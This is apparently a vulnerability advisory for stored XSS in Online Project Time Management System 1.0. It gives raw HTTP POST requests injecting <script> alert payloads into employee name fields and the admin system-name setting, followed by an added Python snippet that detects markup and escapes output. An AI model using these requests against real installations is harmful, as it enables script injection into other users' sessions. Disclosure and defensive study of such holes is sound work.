# Exploit Title: Online Project Time Management System 1.0 - Multiple Stored XSS (Authenticated)
# Date: 19/01/2022
# Exploit Author: Felipe Alcantara (Filiplain)
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15136/online-project-time-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: Kali Linux
# Description: Stored XSS in multiple fields...

# Steps to reproduce (with employee access)
# Log in as an employee
# Go to: http://localhost/ptms/?page=user
# Add XSS payload to any field of the user's name.
# Click Update

=================
POST /ptms/classes/Users.php?f=save_employee HTTP/1.1
Host: localhost
Content-Length: 1339
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvsLkAfaBC64Uzoak
Origin: http://localhost
Referer: http://localhost/ptms/?page=user
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm
Connection: close

------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="id"

4
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="code"

2022-0003
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="generated_password"


------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="firstname"

Mark
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="middlename"

<script>alert("XSS_TEST")</script>
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="lastname"

Cooper
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="gender"

Male
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="department"

IT Department
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="position"

Department Manager
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="email"

mcooper@sample.com
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="password"


------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryvsLkAfaBC64Uzoak--
=================

-----------------------------------------------------------------------------

# Steps to reproduce (with admin access)
# Log in to the admin panel
# Go to: http://localhost/ptms/admin/?page=system_info
# Add XSS payload to the 'System Name' field
# Click Update

=================
POST /ptms/classes/SystemSettings.php?f=update_settings HTTP/1.1
Host: localhost
Content-Length: 603
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCibB6pEzThjb4Zcq
Origin: http://localhost
Referer: http://localhost/ptms/admin/?page=system_info
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm
Connection: close

------WebKitFormBoundaryCibB6pEzThjb4Zcq
Content-Disposition: form-data; name="name"

Online Project Time Management System - PHP <script>alert("XSS")</script>
------WebKitFormBoundaryCibB6pEzThjb4Zcq
Content-Disposition: form-data; name="short_name"

PTMS - PHP
------WebKitFormBoundaryCibB6pEzThjb4Zcq
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryCibB6pEzThjb4Zcq
Content-Disposition: form-data; name="cover"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryCibB6pEzThjb4Zcq--
=================
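Added example (not part of the advisory or the vendor's code) showing the server-side handling that both requests above lack: parse the multipart body of the save_employee request, flag name fields that carry HTML markup so the attempt can be logged, and encode every stored value on output (the equivalent of PHP htmlspecialchars with ENT_QUOTES) so a stored script renders as inert text. The boundary and field names are taken from the request shown; the body is a constructed excerpt of it.

```python
import html
import re

# Boundary from the advisory's save_employee request; SAMPLE_BODY is a constructed
# excerpt of that request's body (a subset of its fields, same wire format).
BOUNDARY = "----WebKitFormBoundaryvsLkAfaBC64Uzoak"
SAMPLE_BODY = (
    b"------WebKitFormBoundaryvsLkAfaBC64Uzoak\r\n"
    b'Content-Disposition: form-data; name="id"\r\n\r\n4\r\n'
    b"------WebKitFormBoundaryvsLkAfaBC64Uzoak\r\n"
    b'Content-Disposition: form-data; name="firstname"\r\n\r\nMark\r\n'
    b"------WebKitFormBoundaryvsLkAfaBC64Uzoak\r\n"
    b'Content-Disposition: form-data; name="middlename"\r\n\r\n'
    b'<script>alert("XSS_TEST")</script>\r\n'
    b"------WebKitFormBoundaryvsLkAfaBC64Uzoak\r\n"
    b'Content-Disposition: form-data; name="lastname"\r\n\r\nCooper\r\n'
    b"------WebKitFormBoundaryvsLkAfaBC64Uzoak\r\n"
    b'Content-Disposition: form-data; name="img"; filename=""\r\n'
    b"Content-Type: application/octet-stream\r\n\r\n\r\n"
    b"------WebKitFormBoundaryvsLkAfaBC64Uzoak--\r\n"
)

# Anything that opens an HTML tag, end tag or comment inside a submitted value.
MARKUP = re.compile(r"<\s*/?[A-Za-z!]")
# The part's field name; the lookbehind keeps filename="" from matching.
FIELD_NAME = re.compile(rb'(?<![A-Za-z])name="([^"]*)"')

def parse_multipart(body: bytes, boundary: str) -> dict[str, str]:
    """Split a multipart/form-data body into {field name: decoded value}."""
    delimiter = b"--" + boundary.encode()
    fields: dict[str, str] = {}
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith(b"--"):          # closing delimiter, no more parts
            break
        head, _, value = chunk.partition(b"\r\n\r\n")
        match = FIELD_NAME.search(head)
        if match:
            # Each value ends with the CRLF that precedes the next delimiter.
            fields[match.group(1).decode()] = value.removesuffix(b"\r\n").decode()
    return fields

def fields_with_markup(fields: dict[str, str]) -> set[str]:
    """Names of submitted fields carrying HTML markup; worth logging server-side."""
    return {name for name, value in fields.items() if MARKUP.search(value)}

def render_safe(value: str) -> str:
    """Escape a stored value for an HTML body or quoted attribute context, as
    PHP's htmlspecialchars($v, ENT_QUOTES) would, so the payload displays as text."""
    return html.escape(value, quote=True)
```

Escaping belongs at every output point (the employee list, the profile page, the system name in the layout), since the same stored value is rendered in more than one place.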